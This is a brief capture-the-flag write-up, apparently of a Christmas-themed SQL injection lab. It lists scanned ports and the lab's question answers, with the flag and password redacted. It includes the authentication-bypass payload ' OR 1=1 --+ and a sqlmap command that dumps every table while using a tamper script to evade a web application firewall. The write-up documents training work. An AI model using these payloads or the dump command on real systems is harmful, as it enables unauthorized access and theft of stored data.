AoC Day5

nmap

22
http
mysql
http

1' AND 1=1 --+

Santa reads some documentation that he wrote when setting up the application, it reads:

"Santa's TODO: Look at alternative database systems that are better than sqlite. Also, don't forget that you installed a Web Application Firewall (WAF) after last year's attack. In case you've forgotten the command, you can tell SQLMap to try and bypass the WAF by using --tamper=space2comment"

here we know --dbms = sqlite and use --tamper=space2comment for WAF

after bypass santapanel -via ' OR 1=1 --+
catch the request using brupsuit and save (as panel-resquest)

sqlmap -r panel-request --dbms sqlite --dump-all --tamper=space2comment

Task

Without using directory brute forcing, what’s Santa’s secret login panel?
```
/santapanel	-via HINT & guessing  {tried gobuster but no result :D}
```
Visit Santa’s secret login panel and bypass the login using SQLi
```
username : ' OR 1=1 --+
password : ' OR 1=1 --+
```
How many entries are there in the gift database?
```
22
```
What did Paul ask for?
```
Github Ownership
```
What is the flag?
```
[redacted challenge flag]
```
What is the admin’s password?
```
[redacted sensitive answer]
```